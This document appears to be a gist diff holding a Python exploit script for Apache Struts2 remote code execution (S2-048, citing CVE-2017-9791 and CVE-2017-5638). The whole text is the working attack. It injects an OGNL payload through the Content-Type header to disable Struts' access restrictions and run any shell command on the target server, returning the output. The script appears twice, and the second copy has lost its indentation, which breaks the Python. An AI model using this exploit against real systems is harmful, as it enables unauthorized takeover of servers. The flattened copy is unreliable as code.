XC3pti0n · April 22, 2018 16:53
diff --git a/gistfile1.txt b/gistfile1.txt
 #!/usr/bin/python
 # Strut2 S2-048 Headers Exploit

 # From https://github.com/rapid7/metasploit-framework/issues/8064
 # From CVE-2017-9791
 # From CVE-2017-5638

 # Coded by Xcepti0n

 import requests
 import urlparse
 import sys

 def exploit(url, cmd):
    print("[+] /bin/bash -c %s" % cmd)
    payload =  "${"
    payload += "(#szgx='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())"
    payload += "}"

    headers = {
 	"Content-type": payload
    }

    data = {
        "username": 'none',
        "password": 'none'
    }
    try:
        r = requests.post(url, headers=headers, data=data)
        print r.text
    except Exception as e:
        print str(e)

 if __name__ == '__main__':
    if len(sys.argv) != 3:
        print('./exploit.py URI.action "shell cmd"')
        sys.exit(1)
    print('[-] Exploiting Apache Struts2 S2-048 - Content-Headers')
    url = sys.argv[1]
    cmd = sys.argv[2]

    exploit(url, cmd)
	#!/usr/bin/python
	# Strut2 S2-048 Headers Exploit

	# From https://github.com/rapid7/metasploit-framework/issues/8064
	# From CVE-2017-9791
	# From CVE-2017-5638

	# Coded by Xcepti0n

	import requests
	import urlparse
	import sys

	def exploit(url, cmd):
	print("[+] /bin/bash -c %s" % cmd)
	payload = "${"
	payload += "(#szgx='multipart/form-data')."
	payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
	payload += "(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
	payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
	payload += "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
	payload += "(#context.setMemberAccess(#dm))))."
	payload += "(#cmd='%s')." % cmd
	payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
	payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
	payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
	payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
	payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())"
	payload += "}"

	headers = {
	"Content-type": payload
	}

	data = {
	"username": 'none',
	"password": 'none'
	}
	try:
	r = requests.post(url, headers=headers, data=data)
	print r.text
	except Exception as e:
	print str(e)

	if __name__ == '__main__':
	if len(sys.argv) != 3:
	print('./exploit.py URI.action "shell cmd"')
	sys.exit(1)
	print('[-] Exploiting Apache Struts2 S2-048 - Content-Headers')
	url = sys.argv[1]
	cmd = sys.argv[2]

	exploit(url, cmd)